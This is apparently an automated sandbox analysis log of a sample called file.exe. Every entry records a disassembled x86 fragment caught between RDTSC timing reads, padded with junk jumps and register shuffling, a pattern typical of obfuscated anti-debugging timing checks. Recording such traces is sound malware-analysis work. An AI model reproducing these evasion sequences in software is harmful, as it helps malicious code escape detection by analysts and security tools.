Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875B2C second address: 875B5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8A9C76F228h 0x00000008 jmp 00007F8A9C76F21Eh 0x0000000d pop ebx 0x0000000e je 00007F8A9C76F21Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875B5E second address: 875B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A9D254EB0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E1B second address: 50D0E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E1F second address: 50D0E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E23 second address: 50D0E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E29 second address: 50D0E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9D254EB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E46 second address: 50D0E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E4A second address: 50D0ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F8A9D254EB8h 0x00000010 and si, D0F8h 0x00000015 jmp 00007F8A9D254EABh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F8A9D254EB8h 0x00000021 adc ecx, 104E2B58h 0x00000027 jmp 00007F8A9D254EABh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esp], ebp 0x00000031 pushad 0x00000032 mov edx, ecx 0x00000034 mov dx, ax 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8A9D254EB9h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5110509 second address: 511052A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 jmp 00007F8A9C76F223h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 511052A second address: 5110540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9D254EB1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5110540 second address: 511059A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8A9C76F227h 0x00000008 pop ecx 0x00000009 movsx edx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F8A9C76F21Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 call 00007F8A9C76F224h 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f pushad 0x00000020 mov dx, EE02h 0x00000024 mov edi, 7985E84Eh 0x00000029 popad 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 511059A second address: 511059E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 511059E second address: 51105A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51105A4 second address: 51105BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9D254EB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51105BC second address: 51105C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A00CC second address: 50A00DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A00DB second address: 50A00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F224h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A00F3 second address: 50A0118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e call 00007F8A9D254EB5h 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0118 second address: 50A0171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, AC03h 0x00000007 mov dx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8A9C76F227h 0x00000019 jmp 00007F8A9C76F223h 0x0000001e popfd 0x0000001f call 00007F8A9C76F228h 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0171 second address: 50A01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 5AEDh 0x00000007 mov di, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8A9D254EB2h 0x00000016 sub cx, A5B8h 0x0000001b jmp 00007F8A9D254EABh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F8A9D254EB6h 0x00000029 and si, 6018h 0x0000002e jmp 00007F8A9D254EABh 0x00000033 popfd 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A01CF second address: 50A01D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0A9D second address: 50C0AA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0AA3 second address: 50C0AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0AA9 second address: 50C0AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0AAD second address: 50C0AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F8A9C76F224h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A9C76F227h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0AE5 second address: 50C0AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9D254EB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0624 second address: 50C0628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0628 second address: 50C062E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C053B second address: 50C056D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F8A9C76F21Dh 0x0000000b sub ch, FFFFFFC6h 0x0000000e jmp 00007F8A9C76F221h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C056D second address: 50C0571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0571 second address: 50C0577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0294 second address: 50C02A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C02A3 second address: 50C02DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F8A9C76F223h 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C02DB second address: 50C0315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8A9D254EABh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov esi, 66A55C8Bh 0x00000016 mov ah, 36h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cx, 7E7Bh 0x00000022 mov dl, cl 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0315 second address: 50C031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C031B second address: 50C031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D00D1 second address: 50D00D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D00D5 second address: 50D00F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8A9D254EB1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D00F0 second address: 50D0100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F21Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5110482 second address: 5110488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E02B4 second address: 50E02BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E02BA second address: 50E02E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A9D254EB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0458 second address: 50C045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C045C second address: 50C0460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0460 second address: 50C0466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0466 second address: 50C046B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C046B second address: 50C04B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F8A9C76F224h 0x00000010 sbb cl, 00000028h 0x00000013 jmp 00007F8A9C76F21Bh 0x00000018 popfd 0x00000019 mov ax, 3E1Fh 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8A9C76F221h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510072A second address: 5100772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8A9D254EAFh 0x00000008 pop ecx 0x00000009 jmp 00007F8A9D254EB9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F8A9D254EB3h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100772 second address: 5100777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100777 second address: 5100794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 9301h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100794 second address: 5100799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100799 second address: 510079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510079E second address: 51007A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51007A4 second address: 51007C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F8A9D254EB5h 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51007C7 second address: 51007F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, 0D95B4D5h 0x0000000a popad 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F8A9C76F220h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8A9C76F21Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51007F4 second address: 5100838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0F7F5A84h 0x00000008 mov esi, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f jmp 00007F8A9D254EB5h 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 mov eax, dword ptr [76FA65FCh] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8A9D254EB4h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100838 second address: 5100847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100847 second address: 51008B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A9D254EAFh 0x00000009 add ecx, 058B7E5Eh 0x0000000f jmp 00007F8A9D254EB9h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test eax, eax 0x0000001c jmp 00007F8A9D254EAAh 0x00000021 je 00007F8B0F077F81h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007F8A9D254EADh 0x0000002f pop eax 0x00000030 jmp 00007F8A9D254EB1h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51008B4 second address: 51008FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A9C76F227h 0x00000009 xor ax, 1E7Eh 0x0000000e jmp 00007F8A9C76F229h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ecx, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51008FB second address: 5100901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100901 second address: 510091C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F227h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510091C second address: 51009A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e jmp 00007F8A9D254EB7h 0x00000013 and ecx, 1Fh 0x00000016 jmp 00007F8A9D254EB6h 0x0000001b ror eax, cl 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8A9D254EADh 0x00000026 and cx, 6F86h 0x0000002b jmp 00007F8A9D254EB1h 0x00000030 popfd 0x00000031 jmp 00007F8A9D254EB0h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100A9A second address: 5100ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 5Bh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F8A9C76F224h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 mov si, 3999h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100ACA second address: 5100AD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B001E second address: 50B004A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A9C76F227h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B004A second address: 50B007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8A9D254EACh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F8A9D254EB0h 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov si, di 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B007D second address: 50B0082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0082 second address: 50B009E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov dh, cl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8A9D254EABh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B009E second address: 50B00BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B00BB second address: 50B018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F8A9D254EAEh 0x0000000f push eax 0x00000010 jmp 00007F8A9D254EABh 0x00000015 xchg eax, ecx 0x00000016 jmp 00007F8A9D254EB6h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov al, 65h 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F8A9D254EAFh 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F8A9D254EB4h 0x0000002e or ax, 76B8h 0x00000033 jmp 00007F8A9D254EABh 0x00000038 popfd 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F8A9D254EB6h 0x00000040 jmp 00007F8A9D254EB5h 0x00000045 popfd 0x00000046 mov edi, ecx 0x00000048 popad 0x00000049 popad 0x0000004a mov ebx, dword ptr [ebp+10h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F8A9D254EB9h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B018F second address: 50B01F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A9C76F227h 0x00000009 add ax, 97EEh 0x0000000e jmp 00007F8A9C76F229h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F8A9C76F220h 0x0000001a and esi, 34B76768h 0x00000020 jmp 00007F8A9C76F21Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B01F5 second address: 50B0222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ch, 3Ah 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e movzx ecx, dx 0x00000011 mov ax, bx 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8A9D254EACh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B032C second address: 50B037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 64509161h 0x0000000b popad 0x0000000c mov edx, dword ptr [esi+44h] 0x0000000f jmp 00007F8A9C76F21Ch 0x00000014 or edx, dword ptr [ebp+0Ch] 0x00000017 jmp 00007F8A9C76F220h 0x0000001c test edx, 61000000h 0x00000022 jmp 00007F8A9C76F220h 0x00000027 jne 00007F8B0E5DD52Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B037B second address: 50B0383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0383 second address: 50B03E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A9C76F222h 0x00000009 add ch, FFFFFFB8h 0x0000000c jmp 00007F8A9C76F21Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F8A9C76F228h 0x00000018 or eax, 1A74D718h 0x0000001e jmp 00007F8A9C76F21Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 test byte ptr [esi+48h], 00000001h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B03E0 second address: 50B03E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B03E4 second address: 50B03EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B03EA second address: 50B042B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A9D254EB8h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F8B0F0C313Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8A9D254EB8h 0x0000001b rdtsc
